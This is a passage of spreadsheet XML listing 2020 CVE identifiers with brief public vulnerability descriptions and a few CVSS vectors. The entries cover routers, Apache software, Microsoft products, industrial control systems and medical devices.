    <t>Xiaomi router R3600 ROM before 1.0.50 is affected by a vulnerability when checking backup file in c_upload interface let attacker able to extract malicious file under any location in /tmp, lead to possible RCE and DoS</t>
  </si>
  <si>
    <t>CVE-2020-11961</t>
  </si>
  <si>
    <t>Xiaomi router R3600 ROM before 1.0.50 is affected by a sensitive information leakage caused by an insecure interface get_config_result without authentication</t>
  </si>
  <si>
    <t>CVE-2020-11963</t>
  </si>
  <si>
    <t>** DISPUTED ** IQrouter through 3.3.1, when unconfigured, has multiple remote code execution vulnerabilities in the web-panel because of Bash Shell Metacharacter Injection. Note: The vendor claims that this vulnerability can only occur on a brand-new network that, after initiating the forced initial configuration (which has a required step for setting a secure password on the system), makes this CVE invalid. This vulnerability is “true for any unconfigured release of OpenWRT, and true of many other new Linux distros prior to being configured for the first time”.</t>
  </si>
  <si>
    <t>CVE-2020-11964</t>
  </si>
  <si>
    <t>** DISPUTED ** In IQrouter through 3.3.1, the Lua function diag_set_password in the web-panel allows remote attackers to change the root password arbitrarily. Note: The vendor claims that this vulnerability can only occur on a brand-new network that, after initiating the forced initial configuration (which has a required step for setting a secure password on the system), makes this CVE invalid. This vulnerability is “true for any unconfigured release of OpenWRT, and true of many other new Linux distros prior to being configured for the first time”.</t>
  </si>
  <si>
    <t>CVE-2020-11965</t>
  </si>
  <si>
    <t>** DISPUTED ** In IQrouter through 3.3.1, there is a root user without a password, which allows attackers to gain full remote access via SSH. Note: The vendor claims that this vulnerability can only occur on a brand-new network that, after initiating the forced initial configuration (which has a required step for setting a secure password on the system), makes this CVE invalid. This vulnerability is “true for any unconfigured release of OpenWRT, and true of many other new Linux distros prior to being configured for the first time”.</t>
  </si>
  <si>
    <t>CVE-2020-11966</t>
  </si>
  <si>
    <t>** DISPUTED ** In IQrouter through 3.3.1, the Lua function reset_password in the web-panel allows remote attackers to change the root password arbitrarily. Note: The vendor claims that this vulnerability can only occur on a brand-new network that, after initiating the forced initial configuration (which has a required step for setting a secure password on the system), makes this CVE invalid. This vulnerability is “true for any unconfigured release of OpenWRT, and true of many other new Linux distros prior to being configured for the first time”.</t>
  </si>
  <si>
    <t>CVE-2020-11967</t>
  </si>
  <si>
    <t>** DISPUTED ** In IQrouter through 3.3.1, remote attackers can control the device (restart network, reboot, upgrade, reset) because of Incorrect Access Control. Note: The vendor claims that this vulnerability can only occur on a brand-new network that, after initiating the forced initial configuration (which has a required step for setting a secure password on the system), makes this CVE invalid. This vulnerability is “true for any unconfigured release of OpenWRT, and true of many other new Linux distros prior to being configured for the first time”.</t>
  </si>
  <si>
    <t>CVE-2020-11968</t>
  </si>
  <si>
    <t>** DISPUTED ** In the web-panel in IQrouter through 3.3.1, remote attackers can read system logs because of Incorrect Access Control. Note: The vendor claims that this vulnerability can only occur on a brand-new network that, after initiating the forced initial configuration (which has a required step for setting a secure password on the system), makes this CVE invalid. This vulnerability is “true for any unconfigured release of OpenWRT, and true of many other new Linux distros prior to being configured for the first time”.</t>
  </si>
  <si>
    <t>CVE-2020-11969</t>
  </si>
  <si>
    <t>If Apache TomEE is configured to use the embedded ActiveMQ broker, and the broker URI includes the useJMX=true parameter, a JMX port is opened on TCP port 1099, which does not include authentication. This affects Apache TomEE 8.0.0-M1 - 8.0.1, Apache TomEE 7.1.0 - 7.1.2, Apache TomEE 7.0.0-M1 - 7.0.7, Apache TomEE 1.0.0 - 1.7.5.</t>
  </si>
  <si>
    <t>CVE-2020-1197</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when Windows Error Reporting manager improperly handles a process crash, aka 'Windows Error Reporting Manager Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-11971</t>
  </si>
  <si>
    <t>Apache Camel's JMX is vulnerable to Rebind Flaw. Apache Camel 2.22.x, 2.23.x, 2.24.x, 2.25.x, 3.0.0 up to 3.1.0 is affected. Users should upgrade to 3.2.0.</t>
  </si>
  <si>
    <t>CVE-2020-11972</t>
  </si>
  <si>
    <t>Apache Camel RabbitMQ enables Java deserialization by default. Apache Camel 2.22.x, 2.23.x, 2.24.x, 2.25.0, 3.0.0 up to 3.1.0 are affected. 2.x users should upgrade to 2.25.1, 3.x users should upgrade to 3.2.0.</t>
  </si>
  <si>
    <t>CVE-2020-11973</t>
  </si>
  <si>
    <t>Apache Camel Netty enables Java deserialization by default. Apache Camel 2.22.x, 2.23.x, 2.24.x, 2.25.0, 3.0.0 up to 3.1.0 are affected. 2.x users should upgrade to 2.25.1, 3.x users should upgrade to 3.2.0.</t>
  </si>
  <si>
    <t>CVE-2020-11974</t>
  </si>
  <si>
    <t>In DolphinScheduler 1.2.0 and 1.2.1, with mysql connectorj a remote code execution vulnerability exists when choosing mysql as database.</t>
  </si>
  <si>
    <t>CVE-2020-11975</t>
  </si>
  <si>
    <t>Apache Unomi allows conditions to use OGNL scripting which offers the possibility to call static Java classes from the JDK that could execute code with the permission level of the running Java process.</t>
  </si>
  <si>
    <t>CVE-2020-11976</t>
  </si>
  <si>
    <t>By crafting a special URL it is possible to make Wicket deliver unprocessed HTML templates. This would allow an attacker to see possibly sensitive information inside a HTML template that is usually removed during rendering. Affected are Apache Wicket versions 7.16.0, 8.8.0 and 9.0.0-M5</t>
  </si>
  <si>
    <t>CVE-2020-11977</t>
  </si>
  <si>
    <t>In Apache Syncope 2.1.X releases prior to 2.1.7, when the Flowable extension is enabled, an administrator with workflow entitlements can use Shell Service Tasks to perform malicious operations, including but not limited to file read, file write, and code execution.</t>
  </si>
  <si>
    <t>CVE-2020-11978</t>
  </si>
  <si>
    <t>An issue was found in Apache Airflow versions 1.10.10 and below. A remote code/command injection vulnerability was discovered in one of the example DAGs shipped with Airflow which would allow any authenticated user to run arbitrary commands as the user running airflow worker/scheduler (depending on the executor in use). If you already have examples disabled by setting load_examples=False in the config then you are not vulnerable.</t>
  </si>
  <si>
    <t>CVE-2020-11979</t>
  </si>
  <si>
    <t>As mitigation for CVE-2020-1945 Apache Ant 1.10.8 changed the permissions of temporary files it created so that only the current user was allowed to access them. Unfortunately the fixcrlf task deleted the temporary file and created a new one without said protection, effectively nullifying the effort. This would still allow an attacker to inject modified source files into the build process.</t>
  </si>
  <si>
    <t>CVE-2020-1198</t>
  </si>
  <si>
    <t>A cross-site-scripting (XSS) vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server, aka 'Microsoft Office SharePoint XSS Vulnerability'. This CVE ID is unique from CVE-2020-1227, CVE-2020-1345, CVE-2020-1482, CVE-2020-1514, CVE-2020-1575.</t>
  </si>
  <si>
    <t>CVE-2020-11980</t>
  </si>
  <si>
    <t>In Karaf, JMX authentication takes place using JAAS and authorization takes place using ACL files. By default, only an "admin" can actually invoke on an MBean. However there is a vulnerability there for someone who is not an admin, but has a "viewer" role. In the 'etc/jmx.acl.cfg', such as role can call get*. It's possible to authenticate as a viewer role + invokes on the MLet getMBeansFromURL method, which goes off to a remote server to fetch the desired MBean, which is then registered in Karaf. At this point the attack fails as "viewer" doesn't have the permission to invoke on the MBean. Still, it could act as a SSRF style attack and also it essentially allows a "viewer" role to pollute the MBean registry, which is a kind of privilege escalation. The vulnerability is low as it's possible to add a ACL to limit access. Users should update to Apache Karaf 4.2.9 or newer.</t>
  </si>
  <si>
    <t>CVE-2020-11981</t>
  </si>
  <si>
    <t>An issue was found in Apache Airflow versions 1.10.10 and below. When using CeleryExecutor, if an attacker can connect to the broker (Redis, RabbitMQ) directly, it is possible to inject commands, resulting in the celery worker running arbitrary commands.</t>
  </si>
  <si>
    <t>CVE-2020-11982</t>
  </si>
  <si>
    <t>An issue was found in Apache Airflow versions 1.10.10 and below. When using CeleryExecutor, if an attack can connect to the broker (Redis, RabbitMQ) directly, it was possible to insert a malicious payload directly to the broker which could lead to a deserialization attack (and thus remote code execution) on the Worker.</t>
  </si>
  <si>
    <t>CVE-2020-11983</t>
  </si>
  <si>
    <t>An issue was found in Apache Airflow versions 1.10.10 and below. It was discovered that many of the admin management screens in the new/RBAC UI handled escaping incorrectly, allowing authenticated users with appropriate permissions to create stored XSS attacks.</t>
  </si>
  <si>
    <t>CVE-2020-11984</t>
  </si>
  <si>
    <t>Apache HTTP server 2.4.32 to 2.4.44 mod_proxy_uwsgi info disclosure and possible RCE</t>
  </si>
  <si>
    <t>CVE-2020-11985</t>
  </si>
  <si>
    <t>IP address spoofing when proxying using mod_remoteip and mod_rewrite For configurations using proxying with mod_remoteip and certain mod_rewrite rules, an attacker could spoof their IP address for logging and PHP scripts. Note this issue was fixed in Apache HTTP Server 2.4.24 but was retrospectively allocated a low severity CVE in 2020.</t>
  </si>
  <si>
    <t>CVE-2020-11986</t>
  </si>
  <si>
    <t>To be able to analyze gradle projects, the build scripts need to be executed. Apache NetBeans follows this pattern. This causes the code of the build script to be invoked at load time of the project. Apache NetBeans up to and including 12.0 did not request consent from the user for the analysis of the project at load time. This in turn will run potentially malicious code, from an external source, without the consent of the user.</t>
  </si>
  <si>
    <t>CVE-2020-11987</t>
  </si>
  <si>
    <t>Apache Batik 1.13 is vulnerable to server-side request forgery, caused by improper input validation by the NodePickerPanel. By using a specially-crafted argument, an attacker could exploit this vulnerability to cause the underlying server to make arbitrary GET requests.</t>
  </si>
  <si>
    <t>CVE-2020-11988</t>
  </si>
  <si>
    <t>Apache XmlGraphics Commons 2.4 and earlier is vulnerable to server-side request forgery, caused by improper input validation by the XMPParser. By using a specially-crafted argument, an attacker could exploit this vulnerability to cause the underlying server to make arbitrary GET requests. Users should upgrade to 2.6 or later.</t>
  </si>
  <si>
    <t>CVE-2020-11989</t>
  </si>
  <si>
    <t>Apache Shiro before 1.5.3, when using Apache Shiro with Spring dynamic controllers, a specially crafted request may cause an authentication bypass.</t>
  </si>
  <si>
    <t>CVE-2020-1199</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Feedback Hub improperly handles objects in memory, aka 'Windows Feedback Hub Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-11990</t>
  </si>
  <si>
    <t>We have resolved a security issue in the camera plugin that could have affected certain Cordova (Android) applications. An attacker who could install (or lead the victim to install) a specially crafted (or malicious) Android application would be able to access pictures taken with the app externally.</t>
  </si>
  <si>
    <t>CVE-2020-11991</t>
  </si>
  <si>
    <t>When using the StreamGenerator, the code parse a user-provided XML. A specially crafted XML, including external system entities, could be used to access any file on the server system.</t>
  </si>
  <si>
    <t>CVE-2020-11993</t>
  </si>
  <si>
    <t>Apache HTTP Server versions 2.4.20 to 2.4.43 When trace/debug was enabled for the HTTP/2 module and on certain traffic edge patterns, logging statements were made on the wrong connection, causing concurrent use of memory pools. Configuring the LogLevel of mod_http2 above "info" will mitigate this vulnerability for unpatched servers.</t>
  </si>
  <si>
    <t>CVE-2020-11994</t>
  </si>
  <si>
    <t>Server-Side Template Injection and arbitrary file disclosure on Camel templating components</t>
  </si>
  <si>
    <t>CVE-2020-11995</t>
  </si>
  <si>
    <t>A deserialization vulnerability existed in dubbo 2.7.5 and its earlier versions, which could lead to malicious code execution. Most Dubbo users use Hessian2 as the default serialization/deserialization protool, during Hessian2 deserializing the HashMap object, some functions in the classes stored in HasMap will be executed after a series of program calls, however, those special functions may cause remote command execution. For example, the hashCode() function of the EqualsBean class in rome-1.7.0.jar will cause the remotely load malicious classes and execute malicious code by constructing a malicious request. This issue was fixed in Apache Dubbo 2.6.9 and 2.7.8.</t>
  </si>
  <si>
    <t>CVE-2020-11996</t>
  </si>
  <si>
    <t>A specially crafted sequence of HTTP/2 requests sent to Apache Tomcat 10.0.0-M1 to 10.0.0-M5, 9.0.0.M1 to 9.0.35 and 8.5.0 to 8.5.55 could trigger high CPU usage for several seconds. If a sufficient number of such requests were made on concurrent HTTP/2 connections, the server could become unresponsive.</t>
  </si>
  <si>
    <t>CVE-2020-11997</t>
  </si>
  <si>
    <t>Apache Guacamole 1.2.0 and earlier do not consistently restrict access to connection history based on user visibility. If multiple users share access to the same connection, those users may be able to see which other users have accessed that connection, as well as the IP addresses from which that connection was accessed, even if those users do not otherwise have permission to see other users.</t>
  </si>
  <si>
    <t>CVE-2020-11998</t>
  </si>
  <si>
    <t>A regression has been introduced in the commit preventing JMX re-bind. By passing an empty environment map to RMIConnectorServer, instead of the map that contains the authentication credentials, it leaves ActiveMQ open to the following attack: https://docs.oracle.com/javase/8/docs/technotes/guides/management/agent.html "A remote client could create a javax.management.loading.MLet MBean and use it to create new MBeans from arbitrary URLs, at least if there is no security manager. In other words, a rogue remote client could make your Java application execute arbitrary code." Mitigation: Upgrade to Apache ActiveMQ 5.15.13</t>
  </si>
  <si>
    <t>CVE-2020-11999</t>
  </si>
  <si>
    <t>FactoryTalk Linx versions 6.00, 6.10, and 6.11, RSLinx Classic v4.11.00 and prior,Connected Components Workbench: Version 12 and prior, ControlFLASH: Version 14 and later, ControlFLASH Plus: Version 1 and later, FactoryTalk Asset Centre: Version 9 and later, FactoryTalk Linx CommDTM: Version 1 and later, Studio 5000 Launcher: Version 31 and later Stud, 5000 Logix Designer software: Version 32 and prior is vulnerable. An exposed API call allows users to provide files to be processed without sanitation. This may allow an attacker to specify a filename to execute unauthorized code and modify files or data.</t>
  </si>
  <si>
    <t>CVE-2020-1200</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package, aka 'Microsoft SharePoint Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1210, CVE-2020-1452, CVE-2020-1453, CVE-2020-1576, CVE-2020-1595.</t>
  </si>
  <si>
    <t>CVE-2020-12000</t>
  </si>
  <si>
    <t>The affected product is vulnerable to the handling of serialized data. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data on the Ignition 8 Gateway (versions prior to 8.0.10) and Ignition 7 Gateway (versions prior to 7.9.14), allowing an attacker to obtain sensitive information.</t>
  </si>
  <si>
    <t>CVE-2020-12001</t>
  </si>
  <si>
    <t>FactoryTalk Linx versions 6.00, 6.10, and 6.11, RSLinx Classic v4.11.00 and prior,Connected Components Workbench: Version 12 and prior, ControlFLASH: Version 14 and later, ControlFLASH Plus: Version 1 and later, FactoryTalk Asset Centre: Version 9 and later, FactoryTalk Linx CommDTM: Version 1 and later, Studio 5000 Launcher: Version 31 and later Stud, 5000 Logix Designer software: Version 32 and prior is vulnerable. The parsing mechanism that processes certain file types does not provide input sanitation. This may allow an attacker to use specially crafted files to traverse the file system and modify or expose sensitive data or execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2020-12002</t>
  </si>
  <si>
    <t>Advantech WebAccess Node, Version 8.4.4 and prior, Version 9.0.0. Multiple stack-based buffer overflow vulnerabilities exist caused by a lack of proper validation of the length of user-supplied data, which may allow remote code execution.</t>
  </si>
  <si>
    <t>CVE-2020-12003</t>
  </si>
  <si>
    <t>FactoryTalk Linx versions 6.00, 6.10, and 6.11, RSLinx Classic v4.11.00 and prior,Connected Components Workbench: Version 12 and prior, ControlFLASH: Version 14 and later, ControlFLASH Plus: Version 1 and later, FactoryTalk Asset Centre: Version 9 and later, FactoryTalk Linx CommDTM: Version 1 and later, Studio 5000 Launcher: Version 31 and later Stud, 5000 Logix Designer software: Version 32 and prior is vulnerable. An exposed API call allows users to provide files to be processed without sanitation. This may allow an attacker to use specially crafted requests to traverse the file system and expose sensitive data on the local hard drive.</t>
  </si>
  <si>
    <t>CVE-2020-12004</t>
  </si>
  <si>
    <t>The affected product lacks proper authentication required to query the server on the Ignition 8 Gateway (versions prior to 8.0.10) and Ignition 7 Gateway (versions prior to 7.9.14), allowing an attacker to obtain sensitive information.</t>
  </si>
  <si>
    <t>CVE-2020-12005</t>
  </si>
  <si>
    <t>FactoryTalk Linx versions 6.00, 6.10, and 6.11, RSLinx Classic v4.11.00 and prior,Connected Components Workbench: Version 12 and prior, ControlFLASH: Version 14 and later, ControlFLASH Plus: Version 1 and later, FactoryTalk Asset Centre: Version 9 and later, FactoryTalk Linx CommDTM: Version 1 and later, Studio 5000 Launcher: Version 31 and later Stud, 5000 Logix Designer software: Version 32 and prior is vulnerable. A vulnerability exists in the communication function that enables users to upload EDS files by FactoryTalk Linx. This may allow an attacker to upload a file with bad compression, consuming all the available CPU resources, leading to a denial-of-service condition.</t>
  </si>
  <si>
    <t>CVE-2020-12006</t>
  </si>
  <si>
    <t>Advantech WebAccess Node, Version 8.4.4 and prior, Version 9.0.0. Multiple relative path traversal vulnerabilities exist that may allow a low privilege user to overwrite files outside the application’s control.</t>
  </si>
  <si>
    <t>CVE-2020-12007</t>
  </si>
  <si>
    <t>A specially crafted communication packet sent to the affected devices could allow remote code execution and a denial-of-service condition due to a deserialization vulnerability. This issue affects: Mitsubishi Electric MC Works64 version 4.02C (10.95.208.31) and earlier, all versions; Mitsubishi Electric MC Works32 version 3.00A (9.50.255.02); ICONICS GenBroker64, Platform Services, Workbench, FrameWorX Server version 10.96 and prior; ICONICS GenBroker32 version 9.5 and prior.</t>
  </si>
  <si>
    <t>CVE-2020-12008</t>
  </si>
  <si>
    <t>Baxter ExactaMix EM 2400 Versions 1.10, 1.11 and ExactaMix EM1200 Versions 1.1, 1.2 systems use cleartext messages to communicate order information with an order entry system. This could allow an attacker with network access to view sensitive data including PHI.</t>
  </si>
  <si>
    <t>CVE-2020-12009</t>
  </si>
  <si>
    <t>A specially crafted communication packet sent to the affected device could cause a denial-of-service condition due to a deserialization vulnerability. This affects: Mitsubishi Electric MC Works64 Version 4.02C (10.95.208.31) and earlier, all versions; Mitsubishi Electric MC Works32 Version 3.00A (9.50.255.02); ICONICS GenBroker64, Platform Services, Workbench, FrameWorX Server v10.96 and prior; ICONICS GenBroker32 v9.5 and prior.</t>
  </si>
  <si>
    <t>CVE-2020-1201</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in the way the Windows Now Playing Session Manager handles objects in memory, aka 'Windows Now Playing Session Manager Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-12010</t>
  </si>
  <si>
    <t>Advantech WebAccess Node, Version 8.4.4 and prior, Version 9.0.0. Multiple relative path traversal vulnerabilities exist that may allow an authenticated user to use a specially crafted file to delete files outside the application’s control.</t>
  </si>
  <si>
    <t>CVE-2020-12011</t>
  </si>
  <si>
    <t>A specially crafted communication packet sent to the affected systems could cause a denial-of-service condition or allow remote code execution. This issue affects: Mitsubishi Electric MC Works64 version 4.02C (10.95.208.31) and earlier, all versions; MC Works32 version 3.00A (9.50.255.02); ICONICS GenBroker64, Platform Services, Workbench, FrameWorX Server version 10.96 and prior; GenBroker32 version 9.5 and prior.</t>
  </si>
  <si>
    <t>CVE-2020-12012</t>
  </si>
  <si>
    <t>Baxter ExactaMix EM 2400 &amp; EM 1200, Versions ExactaMix EM2400 Versions 1.10, 1.11, 1.13, 1.14, ExactaMix EM1200 Versions 1.1, 1.2, 1.4, 1.5, Baxter ExactaMix EM 2400 Versions 1.10, 1.11, and 1.13, and ExactaMix EM1200 Versions 1.1, 1.2, and 1.4 have hard-coded administrative account credentials for the ExactaMix application. Successful exploitation of this vulnerability may allow an attacker with physical access to gain unauthorized access to view/update system configuration or data. This could impact confidentiality and integrity of the system and risk exposure of sensitive information including PHI.</t>
  </si>
  <si>
    <t>CVE-2020-12013</t>
  </si>
  <si>
    <t>A specially crafted WCF client that interfaces to the may allow the execution of certain arbitrary SQL commands remotely. This affects: Mitsubishi Electric MC Works64 Version 4.02C (10.95.208.31) and earlier, all versions; Mitsubishi Electric MC Works32 Version 3.00A (9.50.255.02); ICONICS GenBroker64, Platform Services, Workbench, FrameWorX Server v10.96 and prior; ICONICS GenBroker32 v9.5 and prior.</t>
  </si>
  <si>
    <t>CVE-2020-12014</t>
  </si>
  <si>
    <t>Advantech WebAccess Node, Version 8.4.4 and prior, Version 9.0.0. Input is not properly sanitized and may allow an attacker to inject SQL commands.</t>
  </si>
  <si>
    <t>CVE-2020-12015</t>
  </si>
  <si>
    <t>A specially crafted communication packet sent to the affected systems could cause a denial-of-service condition due to improper deserialization. This issue affects: Mitsubishi Electric MC Works64 version 4.02C (10.95.208.31) and earlier, all versions; Mitsubishi Electric MC Works32 version 3.00A (9.50.255.02); ICONICS GenBroker64, Platform Services, Workbench, FrameWorX Server version 10.96 and prior; ICONICS GenBroker32 version 9.5 and prior.</t>
  </si>
  <si>
    <t>CVE-2020-12016</t>
  </si>
  <si>
    <t>Baxter ExactaMix EM 2400 &amp; EM 1200, Versions ExactaMix EM2400 Versions 1.10, 1.11, 1.13, 1.14, ExactaMix EM1200 Versions 1.1, 1.2, 1.4, 1.5, Baxter ExactaMix EM 2400 Versions 1.10, 1.11, 1.13, 1.14 and ExactaMix EM1200 Versions 1.1, 1.2, 1.4 and 1.5 have hard-coded administrative account credentials for the ExactaMix operating system. Successful exploitation of this vulnerability may allow an attacker who has gained unauthorized access to system resources, including access to execute software or to view/update files, directories, or system configuration. This could allow an attacker with network access to view sensitive data including PHI.</t>
  </si>
  <si>
    <t>CVE-2020-12017</t>
  </si>
  <si>
    <t>GE Grid Solutions Reason RT Clocks, RT430, RT431, and RT434, all firmware versions prior to 08A05. The device’s vulnerability in the web application could allow multiple unauthenticated attacks that could cause serious impact. The vulnerability may allow an unauthenticated attacker to execute arbitrary commands and send a request to a specific URL that could cause the device to become unresponsive. The unauthenticated attacker may change the password of the 'configuration' user account, allowing the attacker to modify the configuration of the device via the web interface using the new password. This vulnerability may also allow an unauthenticated attacker to bypass the authentication required to configure the device and reboot the system.</t>
  </si>
  <si>
    <t>CVE-2020-12018</t>
  </si>
  <si>
    <t>Advantech WebAccess Node, Version 8.4.4 and prior, Version 9.0.0. An out-of-bounds vulnerability exists that may allow access to unauthorized data.</t>
  </si>
  <si>
    <t>CVE-2020-12019</t>
  </si>
  <si>
    <t>WebAccess Node Version 8.4.4 and prior is vulnerable to a stack-based buffer overflow, which may allow an attacker to remotely execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2020-1202</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Diagnostics Hub Standard Collector or the Visual Studio Standard Collector fail to properly handle objects in memory, aka 'Diagnostic Hub Standard Collector Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1203.</t>
  </si>
  <si>
    <t>CVE-2020-12020</t>
  </si>
  <si>
    <t>Baxter ExactaMix EM 2400 Versions 1.10, 1.11, and 1.13 and ExactaMix EM1200 Versions 1.1, 1.2, and 1.4 does not restrict non administrative users from gaining access to the operating system and editing the application startup script. Successful exploitation of this vulnerability may allow an attacker to alter the startup script as the limited-access user.</t>
  </si>
  <si>
    <t>CVE-2020-12021</t>
  </si>
  <si>
    <t>In OSIsoft PI Web API 2019 Patch 1 (1.12.0.6346) and all previous versions, the affected product is vulnerable to a cross-site scripting attack, which may allow an attacker to remotely execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2020-12022</t>
  </si>
  <si>
    <t>Advantech WebAccess Node, Version 8.4.4 and prior, Version 9.0.0. An improper validation vulnerability exists that could allow an attacker to inject specially crafted input into memory where it can be executed.</t>
  </si>
  <si>
    <t>CVE-2020-12023</t>
  </si>
  <si>
    <t>Philips IntelliBridge Enterprise (IBE), Versions B.12 and prior, IntelliBridge Enterprise system integration with SureSigns (VS4), EarlyVue (VS30) and IntelliVue Guardian (IGS). Unencrypted user credentials received in the IntelliBridge Enterprise (IBE) are logged within the transaction logs, which are secured behind the login based administrative web portal. The unencrypted user credentials sent from the affected products listed above, for the purpose of handshake or authentication with the Enterprise Systems, are logged as the payload in IntelliBridge Enterprise (IBE) within the transaction logs. An attacker with administrative privileges could exploit this vulnerability to read plain text credentials from log files.</t>
  </si>
  <si>
    <t>CVE-2020-12024</t>
  </si>
  <si>
    <t>Baxter ExactaMix EM 2400 versions 1.10, 1.11, 1.13, 1.14 and ExactaMix EM1200 Versions 1.1, 1.2, 1.4 and 1.5 does not restrict access to the USB interface from an unauthorized user with physical access. Successful exploitation of this vulnerability may allow an attacker with physical access to the system the ability to load an unauthorized payload or unauthorized access to the hard drive by booting a live USB OS. This could impact confidentiality and integrity of the system and risk exposure of sensitive information including PHI.</t>
  </si>
  <si>
    <t>CVE-2020-12025</t>
  </si>
  <si>
    <t>Rockwell Automation Logix Designer Studio 5000 Versions 32.00, 32.01, and 32.02 vulnerable to an xml external entity (XXE) vulnerability, which may allow an attacker to view hostnames or other resources from the program.</t>
  </si>
  <si>
    <t>CVE-2020-12026</t>
  </si>
  <si>
    <t>CVE-2020-12027</t>
  </si>
  <si>
    <t>All versions of FactoryTalk View SE disclose the hostnames and file paths for certain files within the system. A remote, authenticated attacker may be able to leverage this information for reconnaissance efforts. Rockwell Automation recommends enabling built in security features found within FactoryTalk View SE. Users should follow guidance found in knowledge base articles 109056 and 1126943 to set up IPSec and/or HTTPs.</t>
  </si>
  <si>
    <t>CVE-2020-12028</t>
  </si>
  <si>
    <t>In all versions of FactoryTalk View SEA remote, an authenticated attacker may be able to utilize certain handlers to interact with the data on the remote endpoint since those handlers do not enforce appropriate permissions. Rockwell Automation recommends enabling built in security features found within FactoryTalk View SE. Users should follow guidance found in knowledge base articles 109056 and 1126943 to set up IPSec and/or HTTPs.</t>
  </si>
  <si>
    <t>CVE-2020-12029</t>
  </si>
  <si>
    <t>All versions of FactoryTalk View SE do not properly validate input of filenames within a project directory. A remote, unauthenticated attacker may be able to execute a crafted file on a remote endpoint that may result in remote code execution (RCE). Rockwell Automation recommends applying patch 1126289. Before installing this patch, the patch rollup dated 06 Apr 2020 or later MUST be applied. 1066644 – Patch Roll-up for CPR9 SRx.</t>
  </si>
  <si>
    <t>CVE-2020-1203</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Diagnostics Hub Standard Collector or the Visual Studio Standard Collector fail to properly handle objects in memory, aka 'Diagnostic Hub Standard Collector Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1202.</t>
  </si>
  <si>
    <t>CVE-2020-12030</t>
  </si>
  <si>
    <t>There is a flaw in the code used to configure the internal gateway firewall when the gateway's VLAN feature is enabled. If a user enables the VLAN setting, the internal gateway firewall becomes disabled resulting in exposure of all ports used by the gateway.</t>
  </si>
  <si>
    <t>CVE-2020-12031</t>
  </si>
  <si>
    <t>In all versions of FactoryTalk View SE, after bypassing memory corruption mechanisms found in the operating system, a local, authenticated attacker may corrupt the associated memory space allowing for arbitrary code execution. Rockwell Automation recommends applying patch 1126290. Before installing this patch, the patch rollup dated 06 Apr 2020 or later MUST be applied. 1066644 – Patch Roll-up for CPR9 SRx.</t>
  </si>
  <si>
    <t>CVE-2020-12032</t>
  </si>
  <si>
    <t>Baxter ExactaMix EM 2400 Versions 1.10, 1.11 and ExactaMix EM1200 Versions 1.1, 1.2 systems store device data with sensitive information in an unencrypted database. This could allow an attacker with network access to view or modify sensitive data including PHI.</t>
  </si>
  <si>
    <t>CVE-2020-12033</t>
  </si>
  <si>
    <t>In Rockwell Automation FactoryTalk Services Platform, all versions, the redundancy host service (RdcyHost.exe) does not validate supplied identifiers, which could allow an unauthenticated, adjacent attacker to execute remote COM objects with elevated privileges.</t>
  </si>
  <si>
    <t>CVE-2020-12034</t>
  </si>
  <si>
    <t>Products that use EDS Subsystem: Version 28.0.1 and prior (FactoryTalk Linx software (Previously called RSLinx Enterprise): Versions 6.00, 6.10, and 6.11, RSLinx Classic: Version 4.11.00 and prior, RSNetWorx software: Version 28.00.00 and prior, Studio 5000 Logix Designer software: Version 32 and prior) is vulnerable.The EDS subsystem does not provide adequate input sanitation, which may allow an attacker to craft specialized EDS files to inject SQL queries and manipulate the database storing the EDS files. This can lead to denial-of-service conditions.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:H</t>
  </si>
  <si>
    <t>CVE-2020-12035</t>
  </si>
  <si>
    <t>Baxter PrismaFlex all versions, PrisMax all versions prior to 3.x, The PrismaFlex device contains a hard-coded service password that provides access to biomedical information, device settings, calibration settings, and network configuration. This could allow an attacker to modify device settings and calibration.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:P/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L</t>
  </si>
  <si>
    <t>CVE-2020-12036</t>
  </si>
  <si>
    <t>Baxter PrismaFlex all versions, PrisMax all versions prior to 3.x, The affected devices do not implement data-in-transit encryption (e.g., TLS/SSL) when configured to send treatment data to a PDMS (Patient Data Management System) or an EMR (Electronic Medical Record) system. An attacker could observe sensitive data sent from the device.</t>
  </si>
  <si>
    <t>CVE-2020-12037</t>
  </si>
  <si>
    <t>CVE-2020-12038</t>
  </si>
  <si>
    <t>Products that use EDS Subsystem: Version 28.0.1 and prior (FactoryTalk Linx software (Previously called RSLinx Enterprise): Versions 6.00, 6.10, and 6.11, RSLinx Classic: Version 4.11.00 and prior, RSNetWorx software: Version 28.00.00 and prior, Studio 5000 Logix Designer software: Version 32 and prior) is vulnerable. A memory corruption vulnerability exists in the algorithm that matches square brackets in the EDS subsystem. This may allow an attacker to craft specialized EDS files to crash the EDSParser COM object, leading to denial-of-service conditions.</t>
  </si>
  <si>
    <t>CVE-2020-12039</t>
  </si>
  <si>
    <t>Baxter Sigma Spectrum Infusion Pumps Sigma Spectrum Infusion System v's6.x model 35700BAX &amp; Baxter Spectrum Infusion System v's8.x model 35700BAX2 contain hardcoded passwords when physically entered on the keypad provide access to biomedical menus including device settings, view calibration values, network configuration of Sigma Spectrum WBM if installed.</t>
  </si>
  <si>
    <t>CVE-2020-1204</t>
  </si>
  <si>
    <t>CVE-2020-12040</t>
  </si>
  <si>
